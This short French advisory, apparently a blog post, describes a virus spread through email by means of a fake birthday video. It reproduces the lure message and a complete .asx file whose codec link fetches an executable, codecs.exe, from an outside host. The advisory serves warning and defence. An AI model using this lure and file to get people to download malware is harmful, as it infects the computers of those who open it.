Un nouveau mode de propagation de virus utilisant la messagerie est apparu récemment. Il se présente sous la forme d'un message texte relativement quelconque en français et d'une vidéo. Contrairement au méthodes habituelles d'infection, le virus ne transite pas par la messagerie. Le message n'est donc pas stoppé par les équipements habituels de sécurité.

En fait de vidéo, il s'agit d'un fichier .asx. Ces fichiers sont des fichiers de contrôles pour les lecteurs médias (Winmap, Windows Media Player, etc.). Dans ce fichier sont indiqué l'adresse de téléchargement de la vidéo et en cas de besoin l'adresse des codecs nécessaires à la lecture de la vidéo. Lorsque le lecteur télécharge et tente de lire la vidéo, bien entendu des codecs sont nécessaires pour la lecture de celle-ci. Le lecteur va donc interroger l'adresse renseignée dans le .asx pour récupérer les codecs. Or le fichier de codecs est un exécutable infecté par un virus. Le dernier rempart contre l'infection du poste est l'antivirus local (à jour) du poste.

un exemple :

From: "aaa@bbbb.com" <aaa@bbbb.com>
Subject: Anniversaire

C' est le film de mon anniversaire...
Peux tu reconnaître qui est a coté de moi?

Et le fichier vidéo.asx associé

<ASX version="3.0">
	<ENTRY>
		<TITLE>Codec not found</TITLE>
		<REF HREF ="http://updatecodecs.t35.com/video.avi"/>
		<DURATION VALUE="60:00"/>
		<BANNER HREF ="http://updatecodecs.t35.com/img_en.gif">
			<ABSTRACT>Download Codecs</ABSTRACT>
			<MOREINFO HREF ="http://updatecodecs.t35.com/codecs.exe" />
		</BANNER>
	</ENTRY>
</ASX>

Visiblement cet article a inspiré certains. Lisez la suite ici